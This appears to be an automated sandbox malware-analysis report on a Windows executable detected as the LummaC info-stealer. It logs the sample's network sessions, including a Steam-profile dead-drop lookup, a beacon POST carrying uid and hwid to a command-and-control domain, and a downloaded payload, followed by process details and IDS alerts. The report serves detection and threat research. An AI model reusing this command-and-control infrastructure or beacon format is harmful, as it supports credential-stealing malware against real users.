2`p_xzW]k{N?~>[w3f-wK\|N=;EXvkO@nnpm laS$MDSr!\]6I=@D\"mHmR{xnVQa-\C _dT4/B0rp?/K`iS[EdGE16?j
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 31 fe 77 b4 53 67 99 d9 ef dc cf 4a 2c 6b 83 15 4b 06 52 4e b9 b4 45 35 de 75 b7 46 b2 ea 84 bd ec d1 d9 cd d8 34 bd cc 0f 42 66 69 d6 9b a7 eb 39 e2 cb 06 47 11 58 3a 16 a4 38 15 dc c8 5a fd 7d d3 e0 0c 94 2d 73 d1 a7 9b 03 aa a0 cb e1 c5 f2 b6 31 17 28 96 11 b2 33 20 db 90 51 1c 11 79 a5 86 a1 3f 5a eb 01 6a da 91 4a 68 12 dd 48 97 05 dc 90 48 f0 0a 79 82 9d 8a 31 2f 96 aa 3f 56 25 3e 6a 2e 10 95 17 43 e3 6f 42 ce 66 d1 df 44 5b 94 7e a4 1f 42 20 1f a0 65 dc 2b 49 10 26 62 de 10 21 55 25 a3 82 4a 81 b3 3c 92 e2 40 5e 13 fd d3 76 55 62 8f bf 37 76 03 c1 04 84 4f 5e 08 6f b9 ee 08 3f 61 79 ea 7d 39 b1 f7 35 cc d5 5e bc 8b d0 8e e5 b7 83 50 81 dc a6 91 35 54 80 4a 83 96 23 d7 8f b9 00 0b 0e 52 06 cd 93 82 85 7c e7 9e ca a8 1b f2 e4 66 34 a1 4e 5d 55 bd f8 Data Ascii: 1wSgJ,kKRNE5uF4Bfi9GX:8Z}-s1(3 Qy?ZjJhHHy1/?V%>j.CoBfD[~B e+I&b!U%J<@^vUb7vO^o?ay}95^P5TJ#R\|f4N]U
2025-03-11 00:14:19 UTC	824	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 00:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8x832ZaeceYd%2Bocn9JPt1%2ByzQbiKeXl2jH%2Ff4C86cNUjf3zuWzZ32tJw8%2BPH046NfLeMjP0SFGTYH63z2OXtZGyTi2BoOjzlifr1r7MDoJ459X7PkryOZxELev4uiubFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e6d9cef9247221-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24409&min_rtt=24056&rtt_var=9727&sent=168&recv=446&lost=0&retrans=0&sent_bytes=2833&recv_bytes=590617&delivery_rate=107730&cwnd=249&unsent_bytes=0&cid=b3d00af97096f4bf&ts=2790&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49714	23.197.127.21	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:23 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:14:24 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:14:24 GMT Content-Length: 35725 Connection: close Set-Cookie: sessionid=6a624ee3cc9d62aa4cdece45; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:14:24 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:14:24 UTC	10154	IN	Data Raw: 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 Data Ascii: ype="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 00:14:24 UTC	11149	IN	Data Raw: 75 6f 74 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 Data Ascii: uot;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49716	188.114.96.3	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:26 UTC	265	OUT	POST /aRIsjI HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 99 Host: areawannte.bet
2025-03-11 00:14:26 UTC	99	OUT	Data Raw: 75 69 64 3d 38 36 36 66 63 62 64 30 34 33 33 30 61 38 63 61 31 33 37 37 34 66 30 66 62 31 34 66 35 63 39 33 30 62 32 66 39 30 32 36 37 36 37 37 31 62 61 61 31 38 65 30 26 63 69 64 3d 26 68 77 69 64 3d 31 42 42 31 31 39 43 30 39 32 41 35 41 41 32 32 30 44 46 34 38 30 30 34 41 44 46 30 31 33 37 39 Data Ascii: uid=866fcbd04330a8ca13774f0fb14f5c930b2f902676771baa18e0&cid=&hwid=1BB119C092A5AA220DF48004ADF01379
2025-03-11 00:14:27 UTC	789	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 00:14:26 GMT Content-Type: application/octet-stream Content-Length: 10439 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxEo7SIbawSn1ANDHB3bEM4DSmRoTAzlNyUT7dS09i3nwVtiYg%2BF2d%2BAojSvC3FX8KuzgHdHaAnVJ91j28vnY56%2FT7OySKRCmgPbexnebooXpgaS%2BUIXVhItWGJJJgAD5w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e6da0898994d9a-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18282&min_rtt=17904&rtt_var=5692&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1000&delivery_rate=148345&cwnd=251&unsent_bytes=0&cid=7f7bec024319a581&ts=921&x=0"
2025-03-11 00:14:27 UTC	580	IN	Data Raw: 58 67 71 e8 6d 61 7d d9 fa 3b 77 c3 37 cc ca 34 14 24 4d fb 32 0f 15 cf 63 4f 1b f7 a3 99 f0 ae ac 27 ef a1 c7 b4 d8 90 75 91 1e 86 77 20 a2 14 a5 4b 73 2e 07 cb ef 9d 67 0d 11 97 aa 29 f0 b4 94 27 dc ec d9 20 35 51 d3 43 db 04 18 7f f9 31 a5 79 49 a9 c2 3b fe fa e6 94 08 96 6a df b0 40 be 19 c9 b9 3c f1 8a 19 fe 15 71 27 28 62 6c 4d 24 14 0b 90 ff 7a df a0 c2 a0 f6 ac e4 ad 12 62 fe 5f 56 cb 7c 23 1c 6f 33 3e f7 f5 b3 86 38 ac e6 b8 26 55 fa af d4 a6 15 4f f6 99 e2 5d b4 ec d3 5b d1 31 dd aa 1a ad 65 2a bb a8 00 cf 9d c0 25 5b cd 54 f8 64 e8 6e e5 5f b8 17 31 4d 66 95 ac 1d 4d f4 f1 92 81 91 4a 07 d0 3e a3 73 16 08 99 6a 57 be 62 82 c7 9e 4a e3 55 10 db e7 49 2e 61 ce ad c8 2d a6 aa 66 dd 6c b1 e8 c9 0a 0b 07 62 c7 5c 1f 9f dc ae 44 d9 5f 69 39 30 91 2e Data Ascii: Xgqma};w74$M2cO'uw Ks.g)' 5QC1yI;j@<q'(blM$zb_V\|#o3>8&UO][1e*%[Tdn_1MfMJ>sjWbJUI.a-flb\D_i90.
2025-03-11 00:14:27 UTC	1369	IN	Data Raw: 79 96 d7 dc 64 f4 3d b8 46 64 07 b4 9e 19 89 ea 8d d7 8c c7 8a 14 35 4e 39 ad ff 9d 09 31 3e 0f be 2c 65 9d de ae 28 37 dd a9 ca 5f 4e 51 30 91 ea 7c d2 f6 52 ac 8f 57 34 63 55 43 0c 0c 9c b3 a0 cf c4 2d 00 53 ed 9d 99 e3 a3 2e 70 40 a8 9e e1 95 42 21 4e e9 68 12 03 03 c9 36 8e a0 af 54 b9 7f 83 7d 7f 5c 57 2f 24 57 69 4f 87 a5 29 de 21 e2 25 bf 24 11 85 48 77 81 2b 94 3a 17 4d ae 98 9a f4 e1 ba f3 45 99 7b 6f d1 88 6b 07 9f 1b e8 c7 0d 6e 98 e1 ac ae 6f e6 bb 8e 80 c4 57 69 f3 ba 66 59 c5 ed b4 05 45 4d 29 c7 86 9c ca c8 7a b4 c9 08 03 bf 3c 68 a0 dc bf e2 20 80 7a a4 ed e4 17 3b 90 1b a8 a8 37 80 d6 23 98 e0 a6 60 b1 b8 03 0d 9a d9 fa 38 7a 43 9d b8 b2 45 e1 5e 71 6b bc 64 93 bc 6b 7f 38 72 2c 6e d2 9c 65 71 72 e9 b5 11 46 9e bb e3 67 b9 c4 04 23 38 53 Data Ascii: yd=Fd5N91>,e(7_NQ0\|RW4cUC-S.p@B!Nh6T}\W/$WiO)!%$Hw+:ME{oknoWifYEM)z<h z;7#`8zCE^qkdk8r,neqrFg#8S
2025-03-11 00:14:27 UTC	1369	IN	Data Raw: 94 84 d9 cf 37 a6 41 3b 2e 7d e2 ed 49 7f aa 9d 50 c9 85 01 32 1d d8 72 77 93 ca 39 ac ca c0 17 03 00 47 76 d9 f6 dd a4 13 7d 42 a5 ab a1 47 74 2a 01 80 b8 2c 06 6a 83 5c 34 df 45 7e 9a 16 5c af 85 f6 c5 f7 42 ad aa fc d3 5a 86 b1 5a f4 6e 09 68 a4 41 cd 8c ef 2f 68 de 07 29 67 60 bd 4e 9c 4d 30 7c 1d e8 d1 d1 0e 4d eb a0 c4 d4 07 5e df 48 96 2c 2d 78 48 db 02 17 68 49 5c 00 1f 67 b2 47 de f8 95 df 7f 3c a6 b8 e2 54 54 f7 b2 41 83 4b fc c2 d0 09 7d 15 7b e7 e9 ec 3e 90 4c 41 43 a7 5a 68 93 a6 bc 65 98 cd 28 48 e3 28 0c cf 36 a7 05 7c f7 b6 f2 2e a9 88 79 87 c2 fc 0c f1 d5 d0 f2 98 3b 6c 36 b8 49 a6 6c 72 30 26 17 52 34 a9 3a 7c 33 97 8f 6b b6 4c 92 b3 bb 05 81 02 57 60 d8 8a 11 86 75 2a 55 55 ab ab e8 7b a0 66 2c 4c b8 80 bd d4 7e 7b 4d 50 4d f4 9c b2 da Data Ascii: 7A;.}IP2rw9Gv}BGt,j\4E~\BZZnhA/h)g`NM0\|M^H,-xHhI\gG<TTAK}{>LACZhe(H(6\|.y;l6Ilr0&R4:\|3kLW`uUU{f,L~{MPM
2025-03-11 00:14:27 UTC	1369	IN	Data Raw: 9e f8 f6 b4 28 0e 55 ac 99 75 23 d7 19 f4 4d 47 96 cd 00 bf 38 ab 15 8c 68 14 1f f1 d7 dd 3c c0 22 78 d2 8f 09 17 a7 e3 c5 6a c2 03 81 88 cd e5 ae 65 a3 fc 47 53 0d 30 b6 0c 4a 36 cb 2f fc 3e 4f a0 37 1f af 4e f5 5c 49 bb d3 6c 7e 49 ca 8f 54 aa dc 19 ea 13 8d d1 fe 0c be 8f 1d e3 8e f9 92 08 68 46 41 0b e5 22 c6 ba e0 bf 62 8d 70 12 f3 1f 44 50 3d 04 7c 80 3d fd 89 7c 13 01 6b f6 25 90 32 e6 5a 77 9f 42 a8 07 76 ca ba 6c 53 49 73 2f ac 0c d2 be 95 45 2b a0 2f b3 68 dc 23 24 76 d1 c9 82 c5 a0 82 a4 c9 c8 1d a4 21 88 c6 5e 47 9a fa 6f e1 ca 33 27 9f 16 37 57 f9 cd 75 0e 82 31 5b e4 38 5a b3 80 68 13 cb 9e 01 65 03 a9 6d 04 f4 fa 27 67 f5 d6 f4 cb d5 d3 a8 ad 77 28 15 93 6e c7 34 7e e8 23 5b 63 b0 3a 4b cf 9c 55 c3 5c 66 cb 49 d3 2e 58 bc f5 12 04 c5 63 9b Data Ascii: (Uu#MG8h<"xjeGS0J6/>O7N\Il~IThFA"bpDP=\|=\|k%2ZwBvlSIs/E+/h#$v!^Go3'7Wu1[8Zhem'gw(n4~#[c:KU\fI.Xc
2025-03-11 00:14:27 UTC	1369	IN	Data Raw: 74 fe ba cb 63 6a ad a9 9f 03 e6 b4 2d 22 64 c8 b9 93 ab c6 36 47 42 0d 0e ea 85 b9 0b 86 66 e6 b7 8d f2 5d d4 54 2f 03 4d 0d 5c b9 33 e3 cb 15 a8 ea 8d 26 9c 0f 63 9d 23 94 ee 67 e3 8d ad 27 30 dc ef 89 21 45 92 11 24 f1 47 6d 05 78 e4 0f 0f fe 7d 41 a5 3b af ea 81 3b ff 9d d7 57 bb 5f 91 d1 fc b6 0a 52 e8 b0 a2 7b 64 45 64 0c 7e 22 79 8c 0a ce d3 f9 b0 43 ce 76 04 57 12 6d 84 45 ae cb af 08 f9 e8 82 51 9d 17 f6 2f 5a 81 bf d1 3b 7f 87 c4 0f 6c 65 54 d2 74 b1 b5 fe f2 67 ed fa 5d 89 5b 77 d6 f9 46 dd 95 11 99 1b 26 aa 35 23 68 7d dd a9 87 d6 5d 95 f0 74 1b a1 27 d1 46 0a 88 00 34 5d f0 2a 4d 59 45 4d df 25 b1 42 4c 76 eb 0a 62 79 9e 78 e9 9c c5 7d f5 2e 63 78 a9 5f ee 5a 80 38 4a c7 1e 95 34 d9 bf a6 4f ac 00 bb f5 68 76 c2 c9 aa 3e fa 45 36 46 2d bc a2 Data Ascii: tcj-"d6GBf]T/M\3&c#g'0!E$Gmx}A;;W_R{dEd~"yCvWmEQ/Z;leTtg][wF&5#h}]t'F4]*MYEM%BLvbyx}.cx_Z8J4Ohv>E6F-
2025-03-11 00:14:27 UTC	1369	IN	Data Raw: 8d 2f 63 7d 4b 01 60 4b 2b 8f fd 36 51 c0 56 0f 47 a8 c8 13 17 05 5c 7e 03 c5 cf 08 60 3b 71 f0 79 70 5f 08 53 10 9b 38 82 6c ae c7 fc 9a 17 42 6a b6 e4 8f 8d bb 67 48 35 86 65 e6 0a 1a d9 48 ef 8e 53 1e fd 38 d5 92 ec 88 9e 51 c1 74 22 85 30 fd 9a f2 3d 8c 77 f7 d9 0e fc c0 50 99 7f 4b 3c 94 25 e3 15 a2 54 56 82 17 f9 fa b7 f6 27 8b 98 73 89 0d 08 62 30 9f d4 60 10 09 93 b7 5a 96 14 60 d4 33 a6 ce b3 f2 04 70 ec 83 60 f3 7e 49 d5 ea f5 07 fa 70 04 24 30 cd 55 52 10 59 f3 1c 22 5a ba 65 97 d9 ef 3a e0 31 35 56 db 73 89 1e 5b c5 fb 0a 59 53 6d a0 26 fc a7 c7 ba 70 ee a6 93 7a 85 35 1e 50 75 46 86 02 3e 21 d3 d1 0d 1a 56 d1 31 11 2c b4 1b d1 70 14 cf d3 75 e6 83 5e 43 13 64 a8 dc 27 f9 d9 02 6a 6c fb 10 de 42 5b a3 48 29 72 08 87 a7 64 91 40 a2 2a be 50 7f Data Ascii: /c}K`K+6QVG\~`;qyp_S8lBjgH5eHS8Qt"0=wPK<%TV'sb0`Z`3p`~Ip$0URY"Ze:15Vs[YSm&pz5PuF>!V1,pu^Cd'jlB[H)rd@*P
2025-03-11 00:14:27 UTC	1369	IN	Data Raw: c7 c6 e0 c0 89 3e fe d5 73 48 d5 24 7c 49 d4 60 e5 30 35 2e df 43 98 83 53 bb b7 5a 35 89 08 b5 a2 58 40 d4 16 b1 48 1a db b2 cc ed ae 63 57 76 f4 5e 1c 59 af fa be 4f 84 43 c2 f4 9f b3 d8 c9 26 96 ad 28 a2 59 59 25 1b 9a 48 d6 65 04 da 49 99 b6 9c 57 fc e8 0c 0a 5f 8d 93 e8 d3 00 b2 70 29 8f 4c 29 b3 8a 5b 3b d5 f3 ed 09 52 c6 0b ca ed 78 2c 09 6c 06 ab eb 76 20 a3 a6 f1 27 fe ec aa b8 6f e5 5d 15 40 bf e7 75 22 be e5 f5 a6 f0 ab 59 8f 06 95 ae 49 1b 04 b5 bf 1e de be 07 d0 df bd 47 ed f6 8e c3 05 b2 b0 c7 4a 55 8a 4a 8c 22 69 75 8e 4e 3a a9 5e 11 87 d7 82 64 8f fd f4 3b da 52 8e 4a 5f 2d 91 13 d8 b8 0d 4c a3 f8 35 cf 42 0d c2 24 87 9e b4 10 e3 5d 39 cd 62 cf 6e 46 69 4f 58 72 a4 97 49 86 05 5c f0 df 2d f8 06 97 48 b9 16 a2 b0 c7 57 f1 a6 c8 2a 7b ec fb Data Ascii: >sH$\|I`05.CSZ5X@HcWv^YOC&(YY%HeIW_p)L)[;Rx,lv 'o]@u"YIGJUJ"iuN:^d;RJ_-L5B$]9bnFiOXrI\-HW*{
2025-03-11 00:14:27 UTC	1369	IN	Data Raw: 1a 17 ec b7 8c 22 d8 36 17 83 69 97 fe 64 09 cc 7c 87 0f 42 ae c4 2f 30 19 43 05 b8 33 3f 41 71 7f ea 29 15 6a e3 08 05 1d 26 fa 2e bb 55 2a c9 72 61 ec 23 2d 8c 4b e5 f0 12 e9 94 56 d9 64 ab dd 53 53 bf df 4b 40 e6 d2 2e 96 e9 76 24 3b d1 71 36 3b 1b cd c6 4b 81 18 05 36 63 78 33 aa 98 de 29 d1 60 ab 62 8f c3 4b 68 f6 51 f8 75 0e ec c2 57 1e e2 de 54 15 90 58 cd a9 9d fa e0 5e 66 47 a9 1c 5f ac df 78 d9 3a 2f db a8 58 ad 2d b3 2c 4c cf 53 28 ac 64 ec 7b 6f fd 3c c1 6b 2f ca 8c 60 c7 02 7d 14 bc 00 8f f3 85 d9 88 79 08 a1 eb 87 3d a2 b5 34 69 76 94 3e f9 ac c1 06 40 04 e9 db 46 c0 56 ce 9e 20 39 30 66 b4 2f dd 8b 56 38 aa d3 12 c6 f4 97 63 61 8c f1 e1 12 ce e7 89 70 09 65 e3 d7 df aa 08 14 e0 75 b0 be c3 39 70 8a b0 e0 88 36 a1 2e b0 94 cd ba 98 5d f0 2a Data Ascii: "6id\|B/0C3?Aq)j&.Ura#-KVdSSK@.v$;q6;K6cx3)`bKhQuWTX^fG_x:/X-,LS(d{o<k/`}y=4iv>@FV 90f/V8capeu9p6.]
2025-03-11 00:14:27 UTC	276	IN	Data Raw: 7d 61 4b 74 6b 30 fe 54 a7 eb 39 0b 25 2b 99 71 ad 05 73 ae 91 78 c0 bf 37 09 35 a8 00 64 ea 9c 09 80 8e a4 63 6f 5f de 3a ab e6 1e 84 ad 6d d4 7f c2 71 23 11 84 92 58 30 97 cd 6c 6b b5 b2 96 81 8e e3 46 cc b8 d1 2e 13 23 4d fc f3 83 bd 83 61 96 2e 51 2e 8e 0c b7 06 35 60 13 78 30 43 ae 24 a1 44 87 93 14 55 1b c4 ec 44 14 82 c2 bd e9 ea 4a 4c 94 64 30 f2 d1 ab 32 ef 8a a9 d0 28 4d da cd 68 44 cd 76 6d e9 5a 00 d2 4c 17 84 0a 44 58 ac c4 a0 a9 4f 8c 2a 94 f3 4d 64 5f 1e 1e ad 67 03 ea 63 06 96 8f 65 a8 28 4d 24 d6 83 d7 95 7e f9 86 46 b8 79 b1 e8 bc f7 33 a1 7e a8 a7 7d b1 96 f4 6f 04 83 7d ff 7c 9a c9 c8 66 63 e4 ad 0b c8 e4 a2 22 29 88 22 04 0b a3 bc 67 71 fb 5e 2c d8 3d f0 4b e2 63 a4 92 b6 13 fd 33 a7 b6 d1 87 d7 41 fd ac 1e 6d c7 64 b1 e7 27 40 2b 2c Data Ascii: }aKtk0T9%+qsx75dco_:mq#X0lkF.#Ma.Q.5`x0C$DUDJLd02(MhDvmZLDXO*Md_gce(M$~Fy3~}o}\|fc")"gq^,=Kc3Amd'@+,

Target ID:	0
Start time:	20:13:19
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xc90000
File size:	373'760 bytes
MD5 hash:	DC56D5E6F7E20EB80E375F2FF15B9B66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:13:19
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xa70000
File size:	373'760 bytes
MD5 hash:	DC56D5E6F7E20EB80E375F2FF15B9B66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2477728323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	20:13:20
Start date:	10/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 972
Imagebase:	0xeb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com

Source: Joe Sandbox View	IP Address: 92.122.104.90 92.122.104.90
Source: Joe Sandbox View	IP Address: 23.197.127.21 23.197.127.21
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49702 -> 92.122.104.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49701 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49700 -> 92.122.104.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49692 -> 92.122.104.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49706 -> 92.122.104.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 92.122.104.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49695 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49704 -> 92.122.104.90:443
